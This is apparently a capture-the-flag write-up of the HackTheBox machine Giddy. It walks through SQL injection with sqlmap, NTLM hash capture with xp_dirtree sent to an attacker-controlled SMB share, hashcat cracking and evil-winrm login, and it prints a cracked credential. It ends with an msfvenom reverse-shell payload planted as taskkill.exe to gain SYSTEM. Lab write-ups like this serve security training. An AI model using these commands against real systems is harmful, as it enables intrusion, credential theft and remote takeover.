Giddy is a retired machine on HackTheBox. Its difficulty level is ranked as Medium and it has received a 4.9/5 rating from its users.

As usual, I started off with a port scan. Nmap quickly revealed that ports 80, 443, 3389, and 5985 were open.

Web sites are often the easiest targets, so that’s where I began.

While browsing the website, I decided to run a fuzzing tool in the background. This tool scans for directories and files, providing results of its findings. Although ffuf is usually my tool of choice, I decided to use dirbuster this time. Dirbuster offers a GUI, automatically searches directories recursively, and is easy to use.

Dirbuster revealed two new directories not found on the default page: /remote and /mvc.

I first explore /remote, but after a few unsuccessful attempts at SQL Injection and password guessing, I shifted my focus to /mvc.

The URL http://10.10.10.104/mvc offered an eCommerce website that presented a larger attack surface. It didn’t take long to discover the site was vulnerable to SQL Injection. This became apparent when adding an apostrophe to the end of the URL with a parameter of ProductSubCategoryId:

https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26’

Rather than manually injecting a payload, I used sqlmap, an excellent tool that injects various payload queries to access the database.

sqlmap -u https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26 -p ProductSubCategoryId --batch

For sqlmap, I used ‘-u’ to specify the URL where I discovered the potential injection and ‘-p’ for the parameter to be tested. The ‘–batch’ option automatically answers sqlmap’s prompts with default responses. Providing as much information as possible, like the parameter and database type (e.g., MySQL, MSSQL, Postgres, etc.), allows the tool to narrow down its queries, providing faster results and reducing bandwidth usage (and log traces!).

Once sqlmap confirmed the vulnerability of the parameter, I used it to open an interactive SQL shell:

sqlmap -u https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=26 --sql-shell

I first started by checking the database for useful information, like username and passwords, but there was nothing of interest. Realizing the database was MSSQL (not previously known to me), I decided to see if I could use xp_dirtree.

According to hacktricks, “The xp_dirtree stored procedure, for instance, is used to make network requests, but it’s limited to only TCP port 445. The port number isn’t modifiable, but it allows reading from network shares.”

When attempting to connect to an SMB share, Windows provides the user’s username and password hash for access permission. This hash can be cracked using tools like as Hashcat or John The Ripper.

I started by setting up an Impacket smbserver on my machine.

impacket-smbserver secret /tmp -smb2support

Impacket is an excellent suite of networking tools for testing Active Directory in Windows machines. In my command, ‘secret’ is the name of my share, ‘/tmp’ is the directory it points to, and ‘-smb2support’ enables smb2 support.

Once my smbserver was ready, I executed my xp_dirtree command within the sqlmap shell:

exec master.dbo.xp_dirtree '\\10.10.14.9\secret’

This provided exactly what I needed. So, I captured the hash and used Hashcat to crack the password:

hashcat.exe -m 5600 -d 2 -a 0 C:\Users\Justin\Desktop\stacy.txt C:\tools\SecLists\Passwords\Leaked-Databases\rockyou.txt\rockyou.txt

The flags for Hashcat were: ‘-m 5600’ for the NetNTLMv2 hash type (great resource to find the id of your hash: Hashcat Examples Wiki), ‘-d 2’ to use my GPU (ideal for password cracking), ‘-a 0’ for a dictionary attack mode, and the path to my password file, rockyou.txt, a list of over 14 million passwords from leaked databases.

I successfully cracked Stacy’s password:

stacy:xNnWo6272k7x

With credentials, I decided to use evil-winrm to connect to port 5985.

evil-winrm -i 10.10.10.104 -u stacy

A quick enumeration led me to a folder in Stacy’s Documents named “unifivideo”. A search on exploit-db.com, revealed a local privilege escalation exploit: https://www.exploit-db.com/exploits/43390

This exploit reveals that when Ubiquiti services start or stop, they look for an executable named “taskkill.exe” in the C:\ProgramData\unifi-video\ directory, which doesn’t exist. The unifi-video directory inherits the same permissions as its parent, ProgramData, allowing all users read and write access. This enables us to upload a malicious file, name it “taskkill.exe”, and place it in the expected directory. The service responsible for stopping the process, avService.exe, has NT AUTHORITY/SYSTEM permissions. Triggering our payload with this service grants the highest permissions on a Windows machine.

I created a reverse meterpreter shell using msfvenom, named it “taskkill.exe”, and uploaded it to the C:\ProgramData\unifi-video directory.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f exe -o taskkill.exe

I set up a handler to receive the callback from the reverse shell, gaining access to the victim machine.

After setting up the handler, I returned to Stacy’s account and ran get-service “Ubiquiti Unifi Video” to check the service’s status. Then, I executed Stop-Service “Ubiquiti Unifi Video” to trigger the reverse shell.

I now had access as an NT AUTHORITY/SYSTEM account and was able to retrieve the root flag!